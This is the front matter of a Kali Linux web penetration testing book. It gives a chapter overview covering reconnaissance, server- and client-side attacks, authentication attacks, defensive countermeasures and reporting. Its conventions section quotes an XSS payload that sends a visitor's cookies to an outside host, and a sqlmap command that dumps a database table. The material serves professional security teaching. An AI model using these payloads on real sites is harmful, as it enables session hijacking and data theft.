Web Penetration Testing with Kali Linux

Overview of this book

Kali Linux is built for professional penetration testing and security auditing. It is the next generation of BackTrack, the most popular open-source penetration toolkit in the world. Readers will learn how to think like real attackers, exploit systems, and expose vulnerabilities. Even though web applications are developed in a very secure environment and have an intrusion detection system and firewall in place to detect and prevent any malicious activity, open ports are a prerequisite for conducting online business. These ports serve as an open door for attackers to attack these applications. As a result, penetration testing becomes essential to test the integrity of web applications. Web Penetration Testing with Kali Linux is a hands-on guide that will give you step-by-step methods for finding vulnerabilities and exploiting web applications. It looks at the aspects of web penetration testing from the mind of an attacker and provides real-world, practical step-by-step instructions on how to perform web penetration testing exercises. You will learn how to use network reconnaissance to pick your targets and gather information. Then, you will use server-side attacks to expose vulnerabilities in web servers and their applications. Client attacks will exploit the way end users use web applications and their workstations. You will also learn how to use open source tools to write reports and get tips on how to sell penetration tests and look out for common pitfalls. On completion of this book, you will have the skills needed to use Kali Linux for web penetration tests and expose vulnerabilities on web applications and the clients that access them.

Preface

Kali is a Debian Linux based Penetration Testing arsenal used by security professionals (and others) to perform security assessments. Kali offers a range of toolsets customized for identifying and exploiting vulnerabilities in systems. This book is written leveraging tools available in Kali Linux released March 13th, 2013 as well as other open source applications.

Web Penetration Testing with Kali Linux is designed to be a guide for professional Penetration Testers looking to include Kali in a web application penetration engagement. Our goal is to identify the best Kali tool(s) for a specific assignment, provide details on using the application(s), and offer examples of what information could be obtained for reporting purposes based on expert field experience. Kali has various programs and utilities; however, this book will focus on the strongest tool(s) for a specific task at the time of publishing.

The chapters in this book are divided into tasks used in real-world web application Penetration Testing. Chapter 1, Penetration Testing and Setup, provides an overview of basic Penetration Testing concepts, professional service strategies, background on the Kali Linux environment, and setting up Kali for topics presented in this book. Chapters 2-6 cover various web application Penetration Testing concepts, including configuration and reporting examples designed to highlight whether the topics covered can accomplish your desired objective.

Chapter 7, Defensive Countermeasures, serves as a remediation source for systems vulnerable to the attacks presented in previous chapters. Chapter 8, Penetration Test Executive Report, offers reporting best practices and samples that can serve as templates for building executive-level reports. The purpose of designing the book in this fashion is to give the reader a guide for engaging a web application Penetration Test with the best possible tool(s) available in Kali, offer steps to remediate a vulnerability, and show how data captured could be presented in a professional manner.

What this book covers

Chapter 1, Penetration Testing and Setup, covers fundamentals of building a professional Penetration Testing practice. Topics include differentiating a Penetration Test from other services, methodology overview, and targeting web applications. This chapter also provides steps used to set up a Kali Linux environment for tasks covered in this book.

Chapter 2, Reconnaissance, provides various ways to gather information about a target. Topics include highlighting popular free tools available on the Internet as well as Information Gathering utilities available in Kali Linux.

Chapter 3, Server Side Attacks, focuses on identifying and exploiting vulnerabilities in web servers and applications. Tools covered are available in Kali or other open source utilities.

Chapter 4, Client Side Attacks, targets host systems. Topics include social engineering, exploiting host system vulnerabilities, and attacking passwords, as they are the most common means to secure host systems.

Chapter 5, Attacking Authentication, looks at how users and devices authenticate to web applications. Topics include targeting the process of managing authentication sessions, compromising how data is stored on host systems, and man-in-the-middle attack techniques. This chapter also briefly touches on SQL and Cross-Site Scripting attacks.

Chapter 6, Web Attacks, explores how to take advantage of web servers and compromise web applications using exploits such as browser exploitation, proxy attacks, and password harvesting. This chapter also covers methods to interrupt services using denial of service techniques.

Chapter 7, Defensive Countermeasures, provides best practices for hardening your web applications and servers. Topics include security baselines, patch management, password policies, and defending against attack methods covered in previous chapters. This chapter also includes a focused forensics section, as it is important to properly investigate a compromised asset to avoid additional negative impact.

Chapter 8, Penetration Test Executive Report, covers best practices for developing professional post Penetration Testing service reports. Topics include an overview of methods to add value to your deliverable, document formatting, and templates that can be used to build professional reports.

What you need for this book

Readers should have a basic understanding of web applications, networking concepts, and Penetration Testing methodology. This book will include detailed examples of how to execute an attack using tools offered in Kali Linux as well as other open source applications. It is not required, but it is beneficial, to have experience using previous versions of BackTrack or similar programs.

Hardware requirements for building a lab environment and setting up the Kali Linux arsenal are covered in Chapter 1, Penetration Testing and Setup.

Who this book is for

The target audience for this book is professional Penetration Testers or others looking to maximize Kali Linux for a web server or application Penetration Testing exercise. If you are looking to identify how to perform a Penetration Test against web applications and present findings to a customer in a professional manner, then this book is for you.

Conventions

In this book, you will find a number of styles of text that distinguish between different kinds of information. Here are some examples of these styles, and an explanation of their meaning.

Code words in text are shown as follows: "For example, you can call the profile My First Scan or anything else you would like."

A block of code is set as follows:

<script>document.write("<img src='http://kali.drchaos.com/var/www/xss_lab/lab_script.php?"+document.cookie+"'>")</script>

Any command-line input or output is written as follows:

sqlmap -u http://www.drchaous.com/article.php?id=5 -T tablesnamehere -U test --dump

New terms and important words are shown in bold. Words that you see on the screen, in menus or dialog boxes for example, appear in the text like this: "Soon as we click on the Execute button, we receive a SQL injection".

Note

Warnings or important notes appear in a box like this.

Tip

Tips and tricks appear like this.

Reader feedback

Feedback from our readers is always welcome. Let us know what you think about this book—what you liked or may have disliked. Reader feedback is important for us to develop titles that you really get the most out of.

To send us general feedback, simply send an e-mail to , and mention the book title via the subject of your message.

If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, see our author guide on www.packtpub.com/authors.

Customer support

Now that you are the proud owner of a Packt book, we have a number of things to help you to get the most from your purchase.

Errata

Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you find a mistake in one of our books—maybe a mistake in the text or the code—we would be grateful if you would report this to us. By doing so, you can save other readers from frustration and help us improve subsequent versions of this book. If you find any errata, please report them by visiting http://www.packtpub.com/submit-errata, selecting your book, clicking on the errata submission form link, and entering the details of your errata. Once your errata are verified, your submission will be accepted and the errata will be uploaded on our website, or added to any list of existing errata, under the Errata section of that title. Any existing errata can be viewed by selecting your title from http://www.packtpub.com/support.

Piracy

Piracy of copyright material on the Internet is an ongoing problem across all media. At Packt, we take the protection of our copyright and licenses very seriously. If you come across any illegal copies of our works, in any form, on the Internet, please provide us with the location address or website name immediately so that we can pursue a remedy.

Please contact us at with a link to the suspected pirated material.

We appreciate your help in protecting our authors, and our ability to bring you valuable content.

Questions

You can contact us at if you are having a problem with any aspect of the book, and we will do our best to address it.